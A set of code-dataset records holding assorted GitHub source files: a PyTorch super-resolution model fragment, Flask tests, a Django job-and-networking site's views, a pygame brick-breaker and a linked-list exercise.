nn.MaxPool2d(2)\n self.gamma = nn.Parameter(torch.zeros(1))\n # self.add_mean = MeanShift(rgb_mean, rgb_std, 1)\n # self.interpolate_conv = ConvBlock(1, 1,\n # kernel_size=3,\n # act_type=act_type, norm_type=norm_type)\n\n def forward(self, x, rgb):\n self._reset_state()\n\n # we are not using below operation because our LR and HR sizes are same\n # inter_res = nn.functional.interpolate(x, scale_factor=self.upscale_factor, mode='bilinear', align_corners=False)\n # print('before interpolate shape', x.shape)\n # inter_res = self.interpolate_conv(x)\n\n ILR = x\n\n demf = self.conv_in1(x)\n # print('after shape conv_in', x.shape)\n\n # print('Conv in shape', x.shape)\n demf = self.feat_in1(demf)\n \n if debug:\n for i in range(64):\n np.save('before_demf_channel_{}'.format(i), demf.detach().float().cpu().numpy()[0][i])\n rgbf = self.vgg_feat(rgb)\n rgbf = self.maxpool(rgbf)\n ############################## LR block over ##################################\n \n if debug:\n for i in range(10):\n np.save('rgb_channel_{}'.format(i), rgbf.detach().float().cpu().numpy()[0][i])\n outputs = []\n \n for step_no in range(self.num_steps):\n if debug:\n for i in range(64):\n np.save('demf_step_{}_channel_{}'.format(step_no, i), demf.detach().float().cpu().numpy()[0][i])\n \n fused, attn = self.block(demf, rgbf)\n #print('attn shape', attn.shape)\n #attn = self.attn(h)\n max_demf_attn, _ = torch.max(attn[:,:64,:,:], 1)\n max_rgbf_attn, _ = torch.max(attn[:,64:,:,:],1)\n\n if debug:\n print('channel pool dim demf', max_demf_attn.shape)\n np.save('max_demf_attn_step_no_{}'.format(step_no), max_demf_attn.detach().cpu().numpy()[0]) \n np.save('max_rgbf_attn_step_no_{}'.format(step_no), max_rgbf_attn.detach().cpu().numpy()[0])\n if debug: \n for i in range(10):\n np.save('attn_map_step_no_{}_channel_{}'.format(step_no, i), attn.detach().float().cpu().numpy()[0][i])\n for i in range(64,74):\n np.save('attn_map_step_no_{}_channel_{}'.format(step_no, i), attn.detach().float().cpu().numpy()[0][i])\n\n #fused = demf * attn[:,:64,:,:] + rgbf * self.gamma * attn[:,64:,:,:] \n if debug: \n for i in range(10):\n np.save('fused_step_{}_channel_{}'.format(step_no, i), fused.detach().float().cpu().numpy()[0][i])\n \n residual = self.conv_out(self.out(fused))\n out = torch.add(ILR, residual)\n\n outputs.append(out)\n return outputs # return output of every timesteps\n \n def _reset_state(self):\n self.block.reset_state()\n\n","repo_name":"ashj9/AFN","sub_path":"networks/srfbn_arch.py","file_name":"srfbn_arch.py","file_ext":"py","file_size_in_byte":11755,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"28528995304","text":"from flask import url_for\nfrom flask_testing import TestCase\n\nfrom app import create_app, db\nfrom app.models import User\n\n\nclass TodolistClientTestCase(TestCase):\n def create_app(self):\n return create_app(\"testing\")\n\n def setUp(self):\n db.create_all()\n self.username_alice = \"alice\"\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n\n def register_user(self, name):\n response = self.client.post(\n url_for(\"auth.register\"),\n data={\n \"username\": name,\n \"email\": name + \"@example.com\",\n \"password\": \"correcthorsebatterystaple\",\n \"password_confirmation\": \"correcthorsebatterystaple\",\n },\n )\n return response\n\n def login_user(self, name):\n response = self.client.post(\n url_for(\"auth.login\"),\n data={\n \"email_or_username\": name + \"@example.com\",\n \"password\": \"correcthorsebatterystaple\",\n },\n )\n return response\n\n def register_and_login(self, name):\n response = self.register_user(name)\n self.assert_redirects(response, \"/auth/login\")\n response = self.login_user(name)\n self.assert_redirects(response, \"/\")\n\n def test_home_page(self):\n response = self.client.get(url_for(\"main.index\"))\n self.assert_200(response)\n self.assert_template_used(\"index.html\")\n\n def test_register_page(self):\n response = self.client.get(url_for(\"auth.register\"))\n self.assert_200(response)\n self.assert_template_used(\"register.html\")\n\n def test_login_page(self):\n response = self.client.get(url_for(\"auth.login\"))\n self.assert_200(response)\n self.assert_template_used(\"login.html\")\n\n def test_overview_page(self):\n self.register_and_login(self.username_alice)\n response = self.client.get(url_for(\"main.todolist_overview\"))\n # expect not redirect as user is logged in\n self.assert_200(response)\n self.assert_template_used(\"overview.html\")\n\n def test_last_seen_update_after_login(self):\n self.register_user(self.username_alice)\n user = User.query.filter_by(username=self.username_alice).first()\n before = user.last_seen\n self.login_user(self.username_alice)\n after = user.last_seen\n self.assertNotEqual(before, after)\n\n def test_register_and_login_and_logout(self):\n # register a new account\n response = self.register_user(self.username_alice)\n # expect redirect to login\n self.assert_redirects(response, \"/auth/login\")\n\n # login with the new account\n response = self.login_user(self.username_alice)\n # expect redirect to index\n self.assert_redirects(response, \"/\")\n\n # logout\n response = self.client.get(url_for(\"auth.logout\"), follow_redirects=True)\n # follow redirect to index\n self.assert_200(response)\n self.assert_template_used(\"index.html\")\n","repo_name":"rtzll/flask-todolist","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"48"} +{"seq_id":"24379121461","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Project : flask-mega-tutorial\n# @Author : Administrator\n# @CreateTime : 2019/5/22 9:09\n# @File : extensions.py\n\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\n\n\ndb = SQLAlchemy()\nmigrate = Migrate()\n\n\ndef register_extensions(app):\n db.init_app(app)\n migrate.init_app(app, db)\n","repo_name":"wanwei890/pytestdemo","sub_path":"mytools/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1793020740","text":"from django.shortcuts import render, redirect\nfrom .forms import NewUserForm, NewJobForm, LookupByName, ChangeLangForm, LookupByCollege, LookupByMajor\nfrom .forms import ChangeSettingForm, ProfileCreationForm, ApplicationForm\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth.models import User\nfrom .models import Job, userSetting, UserInfo, Friend_Request\nfrom .models import Notification, JobUserR\nfrom django.http import HttpResponse\nfrom django.db.models import Q\nimport datetime\n\n# Create your views here.\ndef homepage(request):\n\tif request.user.is_authenticated:\n\t\tfriendRequest = Friend_Request.objects.filter(to_user=request.user).filter(valid=True)\n\t\tnotis = Notification.objects.filter(user=request.user)\n\telse:\n\t\tfriendRequest = None\n\t\tnotis = None\n\treturn render(request=request, template_name='home/home.html', context={\n\t\t'friendRequest':friendRequest,\n\t\t'notis': notis,\n\t})\n\ndef job_search(request):\n\tjobs = Job.objects.exclude(creator=request.user)\n\tnotis = Notification.objects.filter(user=request.user).filter(isAboutJob=True)\n\n\tfor noti in notis:\n\t\tnoti.delete()\n\n\treturn render(request, 'home/jobsearch.html', context={'jobs': jobs,\n\t\t\t\t\t\t\"notis\": notis, })\ndef makeajob(request):\n\tif len(Job.objects.all()) >= 10:\n\t\tmessages.error(request, f\"Sorry, we have reached our max jobs counts, please check back later.\")\n\t\treturn redirect(\"home:jobsearch\")\n\tif request.method == 'POST':\n\t\tform = NewJobForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tnewJob = form.save(commit=False)\n\t\t\tnewJob.creator = request.user\n\t\t\tnewJob.save()\n\t\t\tjobs = Job.objects.all()\n\t\t\tmessages.success(request, f\"Job created\")\n\t\t\treturn redirect('home:jobs')\n\telse:\n\t\tform = NewJobForm()\n\treturn render(request, 'home/makeajob.html', {'form': form})\n\ndef find_someone(request):\n\tcurU = User.objects.get(pk=request.user.pk) \n\tform = LookupByName()\n\tform2 = LookupByCollege()\n\tform3 = LookupByMajor()\n\tuser = None\n\tif request.method == \"POST\":\n\t\tprint(request.POST)\n\t\tif \"name-bnt\" in request.POST:\n\t\t\tform = LookupByName(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\tfirst_name = form.cleaned_data.get('first_name')\n\t\t\t\tlast_name = form.cleaned_data.get('last_name')\n\t\t\t\t\n\t\t\t\tuser = User.objects.filter(first_name=first_name).filter(last_name=last_name)\n\t\t\t\tprint(user)\n\t\t\t\tif len(user) >= 1:\n\t\t\t\t\tmessages.success(request, \"They are a part of the InCollege system.\")\n\t\t\t\telse:\n\t\t\t\t\tmessages.error(request,\"They are not yet a part of the InCollege system yet.\")\n\n\t\tif \"college-bnt\" in request.POST:\n\t\t\tform2 = LookupByCollege(request.POST)\n\t\t\tif form2.is_valid():\n\t\t\t\tcollege = form2.cleaned_data.get('college')\n\t\t\t\t\n\t\t\t\tuser = UserInfo.objects.filter(university=college)\n\t\t\t\tlinkBack = []\n\t\t\t\tfor i in user:\n\t\t\t\t\tlinkBack.append(i.user)\n\t\t\t\tuser = linkBack\n\t\t\t\tif len(user) >= 1:\n\t\t\t\t\tmessages.success(request, \"They are a part of the InCollege system.\")\n\t\t\t\telse:\n\t\t\t\t\tmessages.error(request,\"They are not yet a part of the InCollege system yet.\")\n\n\t\tif \"major-bnt\" in request.POST:\n\t\t\tform3 = LookupByMajor(request.POST)\n\t\t\tif form3.is_valid():\n\t\t\t\tmajor = form3.cleaned_data.get('major')\n\t\t\t\t\n\t\t\t\tuser = UserInfo.objects.filter(major=major)\n\t\t\t\tlinkBack = []\n\t\t\t\tfor i in user:\n\t\t\t\t\tlinkBack.append(i.user)\n\t\t\t\tuser = linkBack\n\t\t\t\tif len(user) >= 1:\n\t\t\t\t\tmessages.success(request, \"They are a part of the InCollege system.\")\n\t\t\t\telse:\n\t\t\t\t\tmessages.error(request,\"They are not yet a part of the InCollege system yet.\")\n\n\treturn render(request=request, template_name='home/findsomeone.html',context={'form':form,'form2':form2,'form3':form3,'users':user})\n\ndef skill(request):\n\treturn render(request=request, template_name='home/skill.html')\n\ndef underConstruction(request):\n\treturn render(request=request, template_name='home/under_construction.html')\n\ndef register_request(request):\n\tform = NewUserForm()\n\tif len(User.objects.all()) >= 10 :\n\t\tmessages.error(request, \"Sorry, we have reached max users, check back later!\" )\n\t\treturn redirect(\"home:homepage\")\n\tif request.method == \"POST\":\n\t\tform = NewUserForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tuser = form.save()\n\t\t\tlogin(request, user)\n\t\t\tmessages.success(request, \"Registration successful.\" )\n\t\t\treturn redirect(\"home:homepage\")\n\t\tmessages.error(request, \"Unsuccessful registration. Invalid information.\")\n\treturn render (request=request, template_name=\"home/register.html\", context={\"register_form\":form})\n\ndef login_request(request):\n\tform = AuthenticationForm()\n\tif request.method == \"POST\":\n\t\tform = AuthenticationForm(request, data=request.POST)\n\t\tif form.is_valid():\n\t\t\tusername = form.cleaned_data.get('username')\n\t\t\tpassword = form.cleaned_data.get('password')\n\t\t\tuser = authenticate(username=username, password=password)\n\t\t\tif user is not None:\n\t\t\t\tlogin(request, user)\n\t\t\t\tmessages.info(request, f\"You are now logged in as {username}.\")\n\t\t\t\treturn redirect(\"home:homepage\")\n\t\t\telse:\n\t\t\t\tmessages.error(request,\"Invalid username or password.\")\n\t\telse:\n\t\t\tmessages.error(request,\"Invalid username or password.\")\n\treturn render(request=request, template_name=\"home/login.html\", context={\"login_form\":form})\n\ndef logout_request(request):\n\tlogout(request)\n\tmessages.info(request, \"You have successfully logged out.\") \n\treturn redirect(\"home:homepage\")\n\ndef video_display(request):\n\treturn render(request=request, template_name='home/video_display.html')\n\n\ndef general(request):\n\treturn render(request=request, template_name='home/general.html')\n\ndef Browse_InCollege(request):\n\treturn render(request=request, template_name='home/Browse_InCollege.html')\n\ndef buisness_solutions(request):\n\treturn render(request=request, template_name='home/buisness_solutions.html')\n\ndef Directories(request):\n\treturn render(request=request, template_name='home/Directories.html')\n\ndef copyright_notice(request):\n\treturn render(request=request, template_name='home/copyright_notice.html')\n\ndef About(request):\n\treturn render(request=request, template_name='home/About.html')\n\ndef Accessibility(request):\n\treturn render(request=request, template_name='home/Accessibility.html')\n\ndef User_Agreement(request):\n\treturn render(request=request, template_name='home/User_Agreement.html')\n\ndef Privacy_Policy(request):\n\treturn render(request=request, template_name='home/Privacy_Policy.html')\n\ndef Cookie_Policy(request):\n\treturn render( request = request, template_name = \"home/Cookie_policy.html\")\n\ndef Copyright_Policy(request):\n\treturn render(request=request, template_name='home/CopyRight_Policy.html')\n\ndef Brand_Policy(request):\n\treturn render(request=request, template_name='home/Brand_Policy.html')\n\ndef Guest_Controls(request):\n\tform = ChangeSettingForm()\n\tif request.method == \"POST\":\n\t\tprint(request.POST)\n\t\tform = ChangeSettingForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tusrSet, _ = userSetting.objects.get_or_create(user=request.user)\n\t\t\tusrSet.email = form.cleaned_data.get('email')\n\t\t\tusrSet.sms = form.cleaned_data.get('sms')\n\t\t\tusrSet.targetedAds = form.cleaned_data.get('targetedAds')\n\t\t\tusrSet.save()\n\n\t\t\tmessages.success(request,\"Updated\")\n\t\telse:\n\t\t\tmessages.error(request,\"Fail to update.\")\n\t\treturn redirect(\"home:homepage\")\n\treturn render(request=request, template_name='home/Guest_Controls.html',context={\"form\":form})\n\ndef Languages(request):\n\tform = ChangeLangForm()\n\tif request.method == \"POST\":\n\t\tprint(request.POST)\n\t\tform = ChangeLangForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tusrSet, _ = userSetting.objects.get_or_create(user=request.user)\n\t\t\tusrSet.english = form.cleaned_data.get('isEnglish')\n\t\t\tusrSet.save()\n\t\t\tmessages.success(request,\"Updated\")\n\t\telse:\n\t\t\tmessages.error(request,\"Fail to update.\")\n\t\t\treturn redirect(\"home:homepage\")\n\treturn render(request=request, template_name='home/Languages.html',context={\"form\":form})\n\ndef Help_Center(request):\n\treturn render(request=request, template_name='home/Help_Center.html')\n\ndef Press(request):\n\treturn render(request=request, template_name='home/Press.html')\n\ndef Blog(request):\n\treturn render(request=request, template_name='home/Blog.html')\n\ndef Careers(request):\n\treturn render(request=request, template_name='home/Careers.html')\n\ndef Developers(request):\n\treturn render(request=request, template_name='home/Developers.html')\n\ndef NetworkView(request):\n\tfriends = Friend_Request.objects.filter(accepted=True).filter(Q(to_user=request.user) | Q(from_user=request.user))\n\tprint(friends)\n\treturn render(request=request, template_name='home/networks.html',context={'friends':friends})\n\n\ndef send_friend_request_view(request,pk=None):\n\tfrom_user = request.user\n\tto_user = User.objects.get(pk=pk)\n\tobj = Friend_Request.objects.get_or_create(from_user=from_user,to_user=to_user)\n\tmessages.success(request,\"Request sent\")\n\treturn redirect(\"home:findsomeone\")\ndef accept_friend_request_view(request,pk=None):\n\tfriendRequest = Friend_Request.objects.get(pk=pk)\n\tfriendRequest.accepted = True\n\tfriendRequest.valid = False\n\tfriendRequest.save()\n\tmessages.success(request,\"You guys are now frineds\")\n\treturn redirect(\"home:homepage\")\ndef reject_friend_request_view(request,pk=None):\n\tfriendRequest = Friend_Request.objects.get(pk=pk)\n\tfriendRequest.accepted = False\n\tfriendRequest.valid = False\n\tfriendRequest.save()\n\tmessages.success(request,\"Request Rejected\")\n\treturn redirect(\"home:homepage\")\ndef remove_friend_request_view(request,pk=None):\n\tFriend_Request.objects.get(pk=pk).delete()\n\tmessages.success(request,\"Friend Deleted!\")\n\treturn redirect(\"home:Networks\")\n\n\ndef edit_Profile(request):\n\tform = ProfileCreationForm()\n\tcurUserinfo, _ = UserInfo.objects.get_or_create(user=request.user)\n\tform = ProfileCreationForm(instance=curUserinfo)\n\n\tif request.method == \"POST\":\n\t\tform = ProfileCreationForm(request.POST,instance=curUserinfo)\n\t\tif form.is_valid():\n\t\t\tnewP=form.save(commit=False)\n\t\t\tnewP.profileSet=True\n\t\t\tif newP.major is not None:\n\t\t\t\tnewP.major = newP.major.title()\n\t\t\tif newP.university is not None:\n\t\t\t\tnewP.university = newP.university.title()\n\t\t\tif newP.schoolName is not None:\n\t\t\t\tnewP.schoolName = newP.schoolName.title()\n\n\t\t\tnewP.save()\n\t\t\tmessages.success(request,\"Profile Updated\")\n\t\t\treturn redirect(\"home:homepage\")\n\t\telse:\n\t\t\tmessages.error(request,\"Profile Fail to Update\")\n\treturn render(request=request, template_name=\"home/editProfile.html\", context={'form':form})\n\n\ndef Profile_view(request,pk=None):\n\ttarget = User.objects.get(pk=pk)\n\t\n\tuserConnections = Friend_Request.objects.filter(accepted=True).filter((Q(to_user=request.user) & Q(from_user=target))|(Q(from_user=request.user) & Q(to_user=target)))\n\tprofile=None\n\tisFriend=False\n\thasProfile=False\n\tif userConnections.count() != 0:\n\t\tisFriend = True\n\t\tprofile = target.userinfo_set.all()[0]\n\t\thasProfile = profile.profileSet\n\tif request.user.pk == pk:\n\t\thasProfile=True\n\t\tisFriend = True\n\t\tprofile = target.userinfo_set.all()[0]\n\treturn render(request=request, template_name=\"home/Profile.html\",context={'target':target,'profile':profile,'isFriend':isFriend,'hasProfile':hasProfile})\n\ndef noApplyJobView(request):\n\tapplied = JobUserR.objects.filter(Q(isApply=True))\n\tprint(applied)\n\tapplied = applied.values_list(\"jid\")\n\tprint(applied)\n\tjobs = Job.objects.exclude(pk__in=applied).exclude(creator=request.user)\n\n\tcontext = {\n\t\t\"jobs\":jobs,\n\t}\n\treturn render(request=request, template_name=\"home/notappliedjobs.html\",context=context)\ndef myJobView(request):\n\tmyJobs = Job.objects.filter(creator=request.user)\n\trelatedJobs = JobUserR.objects.filter(uid=request.user)\n\tappliedJobs = []\n\tsavedJobs = []\n\tfor jobR in relatedJobs:\n\t\tif jobR.isApply:\n\t\t\tappliedJobs.append(jobR.jid)\n\t\tif jobR.isStarted:\n\t\t\tsavedJobs.append(jobR.jid)\n\tcontext = {\n\t\t\"myJobs\": myJobs,\n\t\t\"appliedJobs\": appliedJobs,\n\t\t\"savedJobs\": savedJobs,\n\t}\n\treturn render(request=request, template_name=\"home/myjobs.html\",context=context)\n\ndef jobDetailView(request,pk=None):\n\ttry:\n\t\tjob = Job.objects.get(pk=pk)\n\texcept:\n\t\tmessages.error(request,\"No Such Job\")\n\t\treturn redirect(\"home:homepage\")\n\t\n\tapplied = False\n\tcantApply = False\n\tsaved = False\n\tif job.creator == request.user:\n\t\tcantApply = True\n\telse:\t\n\t\trela = JobUserR.objects.filter(uid=request.user).filter(jid=job)\n\t\tif len(rela) != 0:\n\t\t\tif rela[0].isApply:\n\t\t\t\tapplied = True\n\t\t\tif rela[0].isStarted:\n\t\t\t\tsaved = True\n\n\tcontext = {\n\t\t\"job\": job,\n\t\t\"applied\": applied,\n\t\t\"cantApply\": cantApply,\n\t\t\"saved\": saved,\n\t}\n\treturn render(request=request, template_name=\"home/jobdetail.html\",context=context)\n\ndef jobDeleteView(request,pk=None):\n\ttry:\n\t\tjob = Job.objects.get(pk=pk)\n\texcept:\n\t\tmessages.error(request,\"You cannot delete this job.\")\n\t\treturn redirect(\"home:homepage\")\n\tif request.user.pk != job.creator.pk:\n\t\tmessages.error(request,\"You cannot delete this job.\")\n\t\treturn redirect(\"home:homepage\")\n\t\n\twhoApplied = job.jobuserr_set.filter(isApply=True)\n\tmsg = f\"Job \\\"{job.title}\\\" is now deleted.\"\n\tfor applicant in whoApplied:\n\t\tnewNoti = Notification.objects.create(user=applicant.uid, isAboutJob=True,content=msg\n\t\t\t)\n\t\tnewNoti.save()\n\tjob.delete()\n\tmessages.success(request,\"Job Deleted.\")\n\treturn redirect(\"home:jobs\")\n\ndef jobApplyView(request,pk=None):\n\ttry:\n\t\tjob = Job.objects.get(pk=pk)\n\texcept:\n\t\tmessages.error(request,\"No such job.\")\n\t\treturn redirect(\"home:homepage\")\n\tif job.creator == request.user:\n\t\tmessages.error(request,\"You cannot apply for your own job.\")\n\t\treturn redirect(\"home:jobs\")\n\ttry:\n\t\tjur = JobUserR.objects.get(uid=request.user,jid=job,isApply=True)\n\t\tmessages.error(request,\"You have already applied.\")\n\t\treturn redirect(\"home:jobs\")\n\texcept:\n\t\tpass\t\n\n\tform = ApplicationForm(request.POST or None)\n\tif request.method == 'POST':\n\t\tif form.is_valid():\n\t\t\ttry:\n\t\t\t\tjur = JobUserR.objects.get(uid=request.user,jid=job,isStarted=True)\n\t\t\t\tjur.graduationDate = form.cleaned_data[\"graduationDate\"]\n\t\t\t\tjur.graduationDate = form.cleaned_data[\"startDate\"]\n\t\t\t\tjur.isApply = True\n\t\t\t\tjur.isStarted = False\n\t\t\t\tjur.save()\n\t\t\texcept:\n\t\t\t\tnewA = form.save(commit=False)\n\t\t\t\tnewA.uid = request.user\n\t\t\t\tnewA.jid = job\n\t\t\t\tnewA.isApply = True\n\t\t\t\tnewA.isStarted = False\n\t\t\t\tnewA.save()\n\t\t\tmessages.success(request,\"You application has been made.\")\n\t\t\treturn redirect(\"home:detail-job\",pk=pk)\n\t\n\tcontext = {\n\t\t'form':form,\n\t\t'job':job,\n\t}\n\treturn render(request,\"home/jobapply.html\",context=context)\n\ndef jobSaveView(request,pk=None):\n\ttry:\n\t\tjob = Job.objects.get(pk=pk)\n\texcept:\n\t\tmessages.error(request,\"No such job.\")\n\t\treturn redirect(\"home:homepage\")\n\n\ttry:\n\t\tjur = JobUserR.objects.get(uid=request.user,jid=job,isApply=True)\n\t\tmessages.error(request,\"You have already applied.\")\n\t\treturn redirect(\"home:detail-job\",pk=pk)\n\texcept:\n\t\tpass\n\ttry:\n\t\tjur = JobUserR.objects.get(uid=request.user,jid=job,isStarted=True)\n\t\tmessages.error(request,\"You have already saved.\")\n\t\treturn redirect(\"home:detail-job\",pk=pk)\n\texcept:\n\t\tpass\n\t\n\ttry:\n\t\tnewR = JobUserR.objects.create(jid=job,uid=request.user,isStarted=True,graduationDate=datetime.datetime.now(),startDate=datetime.datetime.now())\n\t\tnewR.save()\n\t\tmessages.success(request,\"You have saved the job.\")\n\texcept:\n\t\tmessages.error(request,\"Fail to save the job.\")\n\t\treturn redirect(\"home:jobs\")\n\n\treturn redirect(\"home:detail-job\",pk=pk)\ndef cancelApplyView(request,pk=None):\n\ttry:\n\t\tjob = Job.objects.get(pk=pk)\n\t\tjur = JobUserR.objects.get(uid=request.user,jid=job,isApply=True)\n\t\tjur.delete()\n\t\tmessages.success(request,\"You application has been canceled.\")\n\t\treturn redirect(\"home:detail-job\",pk=pk)\n\texcept:\n\t\tmessages.error(request,\"Fail to cancel application.\")\n\t\treturn redirect(\"home:jobs\")\ndef unsaveView(request,pk=None):\n\ttry:\n\t\tjob = Job.objects.get(pk=pk)\n\t\tjur = JobUserR.objects.get(uid=request.user,jid=job,isStarted=True,isApply=False)\n\t\tjur.delete()\n\t\tmessages.success(request,\"Job have been unsaved.\")\n\t\treturn redirect(\"home:detail-job\",pk=pk)\n\texcept Exception as e:\n\t\tprint(e)\n\t\tmessages.error(request,\"Fail to unsave job.\")\n\t\treturn redirect(\"home:jobs\")\n\t","repo_name":"piyushmanjhi/InCollege","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22575861066","text":"\"\"\"\n Project name: SimpleBrickBreak\n File name: main.py\n Author: Hunter Webb\n Date created: 10/18/2021\n Date last modified: 10/24/2021\n Python Version: 3.9.5\n\"\"\"\n\n# Module Imports\n\nimport random\nimport pygame\nimport sys\nfrom pygame.locals import *\nfrom pygame import gfxdraw\n\n# Constants\n\nGAME_OVER = 0\n\nSOLID = 0\nSINGLE = 1\nDOUBLE = 2\nTRAIL = 3\nEXTRA_LIFE = 4\n\nCOLORS = [\n pygame.Color(\"#272727\"), # 0 SOLID\n pygame.Color(\"#28AFB0\"), # 1 SINGLE\n pygame.Color(\"#A11692\"), # 2 DOUBLE\n pygame.Color(\"#FF4F79\"), # 3 TRAIL / +1 BALL\n pygame.Color(\"#5CF64A\"), # 4 EXTRA_LIFE\n pygame.Color(\"#E4FF1A\"), # 5 BALL\n pygame.Color(\"#F1FFE7\") # 6 PADDLE\n]\n\nSCREEN_WIDTH = 400\nSCREEN_HEIGHT = 600\n\nPADDING = 1\n\nPADDLE_WIDTH = 100\nBALL_R = 10\nBRICK_W = 80\nBRICK_H = 30\nN_BRICK_W = SCREEN_WIDTH / (BRICK_W + PADDING)\nN_BRICK_H = (SCREEN_HEIGHT / 3) / (BRICK_H + PADDING)\n\n# Movement Initializers\n\nSPEED = 2\nL_DOWN = False\nR_DOWN = False\n\n\n# Classes\n\nclass Paddle(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def draw(self):\n self.rect = pygame.Rect(int(self.x), int(self.y), PADDLE_WIDTH, 10)\n pygame.gfxdraw.box(screen, self.rect, COLORS[6])\n\n def move(self, d):\n if d and self.x > 0:\n self.x -= SPEED\n if not d and self.x < SCREEN_WIDTH - PADDLE_WIDTH:\n self.x += SPEED\n\n\nclass Ball(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.vx = random.randint(-5, 5) / 10\n self.vy = 10 / SPEED\n\n def draw(self):\n pygame.gfxdraw.filled_circle(screen, int(self.x), int(self.y), BALL_R, COLORS[5])\n\n def update(self):\n global GAME_OVER\n\n # Bottom of the screen\n\n if self.y >= SCREEN_HEIGHT - BALL_R:\n GAME_OVER = 1\n\n # All other walls\n\n if not BALL_R < int(self.x) < SCREEN_WIDTH - BALL_R:\n self.vx *= -1\n if not BALL_R < int(self.y) < SCREEN_HEIGHT - BALL_R:\n self.vy *= -1\n\n # Paddle Collision\n\n if paddle.rect.collidepoint(ball.x, ball.y + BALL_R):\n self.vy *= -1\n\n if L_DOWN:\n if self.vx >= 0:\n self.vx -= 0.1\n else:\n self.vx -= 0.1\n if R_DOWN:\n if self.vx <= 0:\n self.vx += 0.1\n else:\n self.vx += 0.1\n\n if self.vx > 1:\n self.vx = 1\n if self.vx < -1:\n self.vx = -1\n\n self.y += self.vy / SPEED\n self.x += self.vx / SPEED\n\n self.draw()\n\n\nclass Brick(object):\n def __init__(self, x, y, type):\n self.x = x\n self.y = y\n self.type = type\n self.color = COLORS[type]\n self.rect = pygame.Rect(self.x, self.y, BRICK_W, BRICK_H)\n\n def draw(self):\n pygame.gfxdraw.box(screen, self.rect, self.color)\n\n def update(self):\n\n # Brick Collision\n\n if self.rect.collidepoint(ball.x, ball.y - BALL_R) or self.rect.collidepoint(ball.x, ball.y + BALL_R):\n ball.vy *= -1\n brick_array.remove(self)\n pass\n if self.rect.collidepoint(ball.x - BALL_R, ball.y) or self.rect.collidepoint(ball.x + BALL_R, ball.y):\n ball.vx *= -1\n brick_array.remove(self)\n\n if len(brick_array) == 0:\n print('none left')\n\n self.draw()\n\n\n# Game Initialization\n\npygame.init()\npygame.display.set_caption(\"Simple Brick Break\")\npygame.font.init()\nscreen = pygame.display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT])\npaddle = Paddle((SCREEN_WIDTH - PADDLE_WIDTH) / 2, SCREEN_HEIGHT - 50)\nball = Ball(SCREEN_WIDTH / 2, SCREEN_HEIGHT / 2)\nbrick_array = []\npygame.display.update()\n\nfor x in range(int(N_BRICK_W) + 1):\n for y in range(int(N_BRICK_H)):\n brick_array.append(Brick(x * (BRICK_W + PADDING), y * (BRICK_H + PADDING), SINGLE))\n\n\n# Game Loop\n\ndef move():\n if L_DOWN:\n paddle.move(True)\n elif R_DOWN:\n paddle.move(False)\n\n\nwhile True:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_LEFT:\n L_DOWN = True\n elif event.key == K_RIGHT:\n R_DOWN = True\n if event.type == KEYUP:\n if event.key == K_LEFT:\n L_DOWN = False\n elif event.key == K_RIGHT:\n R_DOWN = False\n elif event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n screen.fill(0)\n\n if GAME_OVER:\n font = pygame.font.SysFont('arial black', 55)\n text = font.render(\"GAME OVER!\", True, pygame.Color(\"RED\"))\n text_rect = text.get_rect(center=(SCREEN_WIDTH / 2, SCREEN_HEIGHT / 2))\n screen.blit(text, text_rect)\n else:\n move()\n paddle.draw()\n ball.update()\n for brick in brick_array:\n brick.update()\n\n pygame.display.flip()\n pygame.time.Clock().tick(60)\n","repo_name":"oh/SimpleBrickBreak","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28208172306","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/8/28 08:34\n# @Author : ck\n\"\"\"\n题目:<两两交换链表中的节点>\n 给定一个链表,两两交换其中相邻的节点,并返回交换后的链表。\n\n 你不能只是单纯的改变节点内部的值,而是需要实际的进行节点交换。\n\n 示例:\n\n 给定 1->2->3->4, 你应该返回 2->1->4->3.\n\"\"\"\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n\n def add_node(self, tail: ListNode, p: ListNode, q: ListNode) -> ListNode:\n new_node1 = ListNode(p.val)\n new_node2 = ListNode(q.val)\n tail.next = new_node2\n tail = tail.next\n tail.next = new_node1\n tail = tail.next\n return tail\n\n def swapPairs(self, head: ListNode) -> ListNode:\n result = ListNode(0)\n if not head:\n return result.next\n tail = result\n p = head\n q = p.next\n\n while p and q:\n tail = self.add_node(tail, p, q)\n if q: p = q.next\n if p: q = p.next\n if p:\n new_node = ListNode(p.val)\n tail.next = new_node\n return result.next\n\n\n\"\"\"\n 递归法\n\"\"\"\n\n\nclass Solution1:\n def swapPairs(self, head: ListNode) -> ListNode:\n if head == None or head.next == None:\n return head\n\n res = head.next\n head.next = self.swapPairs(head.next.next)\n res.next = head\n\n return res\n\n\nif __name__ == \"__main__\":\n s = Solution()\n\n data = [1, 2, 3, 4]\n head = ListNode(data[0])\n p = head\n for e in data[1:]:\n node = ListNode(e)\n p.next = node\n p = p.next\n 